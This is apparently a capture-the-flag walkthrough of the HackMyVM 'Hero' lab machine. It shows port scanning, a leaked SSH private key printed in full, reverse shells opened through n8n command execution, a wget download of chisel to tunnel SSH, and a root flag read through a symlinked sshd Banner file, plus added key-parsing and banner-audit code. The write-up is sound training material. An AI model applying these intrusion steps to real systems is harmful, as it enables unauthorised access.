HackMyVM-Hero-Walkthrough
城南花已开 Lv6

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.178 08:00:27:76:df:33 (Unknown)
192.168.60.254 00:50:56:e4:ae:23 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.937 seconds (132.16 hosts/sec). 4 responded
export ip=192.168.60.178
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.178:80
Open 192.168.60.178:5678
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 20:55 CST
Initiating ARP Ping Scan at 20:55
Scanning 192.168.60.178 [1 port]
Completed ARP Ping Scan at 20:55, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:55
Completed Parallel DNS resolution of 1 host. at 20:55, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:55
Scanning 192.168.60.178 [2 ports]
Discovered open port 80/tcp on 192.168.60.178
Discovered open port 5678/tcp on 192.168.60.178
Completed SYN Stealth Scan at 20:55, 0.07s elapsed (2 total ports)
Nmap scan report for 192.168.60.178
Host is up, received arp-response (0.0042s latency).
Scanned at 2025-02-08 20:55:05 CST for 0s

PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
5678/tcp open rrac syn-ack ttl 63
MAC Address: 08:00:27:76:DF:33 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Unusually, the target does not expose port 22. Let's take a look at ports 80 and 5678.

❯ whatweb -v $ip
WhatWeb report for http://192.168.60.178
Status : 200 OK
Title : <None>
IP : 192.168.60.178
Country : RESERVED, ZZ

Summary : HTTPServer[nginx], nginx

Detected Plugins:
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.

String : nginx (from server string)

[ nginx ]
Nginx (Engine-X) is a free, open-source, high-performance
HTTP server and reverse proxy, as well as an IMAP/POP3
proxy server.

Website : http://nginx.net/

HTTP Headers:
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 08 Feb 2025 12:55:53 GMT
Content-Type: text/html
Content-Length: 399
Last-Modified: Thu, 06 Feb 2025 10:12:53 GMT
Connection: close
ETag: "67a48b25-18f"
Accept-Ranges: bytes

❯ whatweb -v $ip:5678
WhatWeb report for http://192.168.60.178:5678
Status : 200 OK
Title : n8n.io - Workflow Automation
IP : 192.168.60.178
Country : RESERVED, ZZ

Summary : HTML5, Script[module,text/javascript], UncommonHeaders[cross-origin-opener-policy,cross-origin-resource-policy,origin-agent-cluster,referrer-policy,x-content-type-options,x-permitted-cross-domain-policies], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge], X-XSS-Protection[0]

Detected Plugins:
[ HTML5 ]
HTML version 5, detected by the doctype declaration


[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.

String : module,text/javascript

[ UncommonHeaders ]
Uncommon HTTP server headers. The blacklist includes all
the standard headers and many non standard but common ones.
Interesting but fairly common headers should have their own
plugins, eg. x-powered-by, server and x-aspnet-version.
Info about headers can be found at www.http-stats.com

String : cross-origin-opener-policy,cross-origin-resource-policy,origin-agent-cluster,referrer-policy,x-content-type-options,x-permitted-cross-domain-policies (from headers)

[ X-Frame-Options ]
This plugin retrieves the X-Frame-Options value from the
HTTP header. - More Info:
http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
aspx

String : SAMEORIGIN

[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx

String : IE=edge

[ X-XSS-Protection ]
This plugin retrieves the X-XSS-Protection value from the
HTTP header. - More Info:
http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
aspx

String : 0

HTTP Headers:
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 0
Accept-Ranges: bytes
Last-Modified: Sat, 08 Feb 2025 12:54:51 GMT
ETag: W/"7b7-194e5a08b43"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Encoding: gzip
Date: Sat, 08 Feb 2025 12:56:12 GMT
Connection: close
Transfer-Encoding: chunked

Private key leak

Running curl against port 80 returns a private key file.

From the private key you can derive the public key to get the user name, or simply read the key's comment.

This gives shawa@hero.

❯ curl $ip
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwgAAAJAczctSHM3L
UgAAAAtzc2gtZWQyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwg
AAAEAnYotUqBFoopjEVz9Sa9viQ8AhNVTx0K19TC7YQyfwAqiYY31x+ZMvvHfmGWC7ZE75
BbdbAKYEtIX75k6CL27CAAAACnNoYXdhQGhlcm8BAgM=
-----END OPENSSH PRIVATE KEY-----
❯ vim id_rsa
chmod 600 id_rsa
❯ ssh-keygen -y -f id_rsa
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKiYY31x+ZMvvHfmGWC7ZE75BbdbAKYEtIX75k6CL27C shawa@hero
❯ ssh-keygen -c -f id_rsa
Old comment: shawa@hero
New comment:
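The key-comment trick above can also be done without ssh-keygen by parsing the openssh-key-v1 container directly. This is an added example, not part of the original post: it decodes the key served on port 80 (copied from the curl output above), reports whether the private section is encrypted, and rebuilds the same public-key line and comment that ssh-keygen -y printed. The private-section layout it walks is the ssh-ed25519 one.

```python
import base64
import struct

# Sample input: the unencrypted ed25519 key served on the target's port 80 (from the curl output above).
LEAKED_KEY = """-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwgAAAJAczctSHM3L
UgAAAAtzc2gtZWQyNTUxOQAAACComGN9cfmTL7x35hlgu2RO+QW3WwCmBLSF++ZOgi9uwg
AAAEAnYotUqBFoopjEVz9Sa9viQ8AhNVTx0K19TC7YQyfwAqiYY31x+ZMvvHfmGWC7ZE75
BbdbAKYEtIX75k6CL27CAAAACnNoYXdhQGhlcm8BAgM=
-----END OPENSSH PRIVATE KEY-----"""


def _string(buf, off):
    # One SSH wire "string": uint32 big-endian length followed by that many bytes.
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_openssh_key(pem):
    """Parse an openssh-key-v1 file: cipher, key type, comment and the public-key line."""
    body = "".join(ln for ln in pem.strip().splitlines() if not ln.startswith("-----"))
    blob = base64.b64decode(body)
    if not blob.startswith(b"openssh-key-v1\x00"):
        raise ValueError("not an openssh-key-v1 file")
    off = 15                                   # length of the magic string above
    cipher, off = _string(blob, off)           # "none" means the private section is plaintext
    kdf, off = _string(blob, off)
    _kdfopts, off = _string(blob, off)
    nkeys, off = struct.unpack(">I", blob[off:off + 4])[0], off + 4
    pubs = []
    for _ in range(nkeys):
        pub, off = _string(blob, off)          # same blob that appears in authorized_keys
        pubs.append(pub)
    private, _ = _string(blob, off)
    ktype = _string(pubs[0], 0)[0].decode()
    info = {"cipher": cipher.decode(), "kdf": kdf.decode(), "type": ktype,
            "encrypted": cipher != b"none", "comment": None,
            "public_key_line": f"{ktype} {base64.b64encode(pubs[0]).decode()}"}
    # Comment lives only in the private section; ssh-ed25519 layout: checkint x2, type, pub, priv, comment.
    if not info["encrypted"] and ktype == "ssh-ed25519":
        c1, c2 = struct.unpack(">II", private[:8])
        if c1 != c2:
            raise ValueError("check integers differ: corrupt or encrypted data")
        p = 8
        for _ in range(3):                     # skip type, public key, private key
            _, p = _string(private, p)
        comment, _ = _string(private, p)
        info["comment"] = comment.decode()
        info["public_key_line"] += " " + info["comment"]
    return info
```

An "encrypted": False result on a file found in a web root is the finding that matters: the key is usable as-is by anyone who fetched it, and the comment names the account it was issued for.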

Exploiting n8n

Port 5678 is running n8n; a quick search shows it is an open-source workflow automation tool.

Roughly speaking, it can execute commands and pass the results on to other workflow nodes.

[image]

It can clearly execute system commands, so create a manual test workflow.

[image]

Commands run fine, so just spawn a reverse shell.

[image]

User privilege escalation

But I found that pwncat-cs could not get a working shell, since the environment has no usable pty, so I suspect this service is running inside Docker.

Just listen with plain nc instead.

Having no tab completion is a bit uncomfortable, but it doesn't matter.

Look at the IP: it is on the 172 network, so it really is inside Docker.

❯ nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.178] 39603
id
uid=1000(node) gid=1000(node) groups=1000(node)
ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:02
inet addr:172.17.0.2 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3505 errors:0 dropped:0 overruns:0 frame:0
TX packets:2396 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1050967 (1.0 MiB) TX bytes:5971826 (5.6 MiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

Use the private key obtained earlier to log in to the host at 172.17.0.1.

I won't do it from the shell; n8n has a built-in SSH node for this.

It runs fine.

[image]

Spawn a reverse shell and gather some information.

Got user.

❯ nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.178] 36351
id
uid=1000(shawa) gid=1000(shawa) groups=1000(shawa)
cd ~
ls
user.txt
ls -a
.
..
.ash_history
.ssh
user.txt
cat us
cat user.txt
HMVOHIMNOTREAL

The user's home directory contains an SSH key pair.

Use busybox to check which ports are listening locally.

172.17.0.1 has port 22 open; that is the port we came in through to bounce the shell up.

busybox netstat -lutnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 172.17.0.1:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5678 0.0.0.0:* LISTEN -
tcp 0 0 :::80 :::* LISTEN -
tcp 0 0 :::5678 :::* LISTEN -

Root privilege escalation

But this shell is painful to use, so let's set up a port forward.

Then log in over SSH.

There is a banner.txt under /opt.

wget 192.168.60.100/chisel
chmod +x chisel
./chisel client 192.168.60.100:2333 R:2222:172.17.0.1:22
---------------------separator----------------------------
❯ ./chisel server --reverse -p 2333
2025/02/08 21:17:51 server: Reverse tunnelling enabled
2025/02/08 21:17:51 server: Fingerprint 4mMcP1IoyCEVfK1HbOIKexTHnXhzLp30RieJdipdJeg=
2025/02/08 22:14:52 server: session#2: tun: proxy#R:2222=>172.17.0.1:22: Listening
❯ ssh shawa@127.0.0.1 -p 2222 -i id_rsa
The authenticity of host '[127.0.0.1]:2222 ([127.0.0.1]:2222)' can't be established.
ED25519 key fingerprint is SHA256:EBZrmf2l6+BtffXHAEtSx6Suq5Wf09yzZlVqbQaGOVM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[127.0.0.1]:2222' (ED25519) to the list of known hosts.
shawa was here.
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <https://wiki.alpinelinux.org/>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

hero:~$ id
uid=1000(shawa) gid=1000(shawa) groups=1000(shawa)
hero:~$ cd /opt
hero:/opt$ ls
banner.txt containerd
hero:/opt$ cat banner.txt
shawa was here.

Look closely: after a successful SSH login, this "shawa was here." is displayed.

hero:/opt$ cat /etc/ssh/sshd_config
…… omitted ……

# no default banner path
Banner /opt/banner.txt

…… omitted ……

So just replace banner.txt with a symlink to /root/root.txt.

hero:/opt$ rm banner.txt
hero:/opt$ ln -s /root/root.txt banner.txt
hero:/opt$ ls
banner.txt containerd
hero:/opt$ ls -al
total 12
drw-rw-rwx 3 root root 4096 Feb 8 14:25 .
drwxr-xr-x 21 root root 4096 Feb 6 10:03 ..
lrwxrwxrwx 1 shawa shawa 14 Feb 8 14:25 banner.txt -> /root/root.txt
drwx--x--x 4 root root 4096 Feb 6 10:14 containerd
❯ ssh shawa@127.0.0.1 -p 2222 -i id_rsa
HMVNOTINPRODLOL
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <https://wiki.alpinelinux.org/>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

That gets us the flag. We never got a root shell, but with the flag in hand it's time to run 🏃‍♂️
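The root step works because sshd opens the Banner file as root before authentication, and /opt on the target is drw-rw-rwx, so any local user can swap the file for a symlink. As an added example that is not part of the original post, this audit rebuilds that layout in a temporary directory (paths and flag contents are constructed stand-ins) and flags the two conditions that matter: a symlinked banner and a world-writable parent directory.

```python
import os
import re
import stat
import tempfile


def banner_findings(sshd_config_path):
    """Audit the Banner directive: sshd reads that file as root before authentication,
    so a symlink or a writable parent directory turns it into an arbitrary-file read."""
    banner = None
    with open(sshd_config_path) as fh:
        for line in fh:
            m = re.match(r"^\s*Banner\s+(\S+)", line, re.IGNORECASE)
            if m:
                banner = m.group(1)          # sshd uses the first value it finds
                break
    if banner in (None, "none"):
        return []
    findings = []
    try:
        st = os.lstat(banner)                # lstat: we want to see the link itself
    except FileNotFoundError:
        return [f"{banner}: configured but missing"]
    if stat.S_ISLNK(st.st_mode):
        findings.append(f"{banner}: symlink -> {os.readlink(banner)} (shown to unauthenticated clients)")
    if st.st_uid != 0:
        findings.append(f"{banner}: owned by uid {st.st_uid}, not root")
    parent = os.path.dirname(os.path.abspath(banner))
    pmode = os.stat(parent).st_mode
    if pmode & stat.S_IWOTH and not pmode & stat.S_ISVTX:
        findings.append(f"{parent}: world-writable without sticky bit, any user can replace the banner")
    return findings


def demo(hardened=False):
    """Constructed scenario mirroring the target: drw-rw-rwx opt/ with banner.txt linked to root.txt."""
    root = tempfile.mkdtemp()
    opt = os.path.join(root, "opt")
    os.mkdir(opt)
    os.chmod(opt, 0o755 if hardened else 0o777)   # chmod, since mkdir's mode is masked by umask
    secret = os.path.join(root, "root.txt")        # constructed stand-in for /root/root.txt
    with open(secret, "w") as fh:
        fh.write("FLAG-PLACEHOLDER\n")
    banner = os.path.join(opt, "banner.txt")
    if hardened:
        with open(banner, "w") as fh:
            fh.write("shawa was here.\n")
    else:
        os.symlink(secret, banner)
    cfg = os.path.join(root, "sshd_config")
    with open(cfg, "w") as fh:
        fh.write(f"# no default banner path\nBanner {banner}\n")
    return banner_findings(cfg)
```

Run against a real host, point banner_findings at /etc/ssh/sshd_config; the fix on the target is a root-owned banner in a root-owned, non-writable directory.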
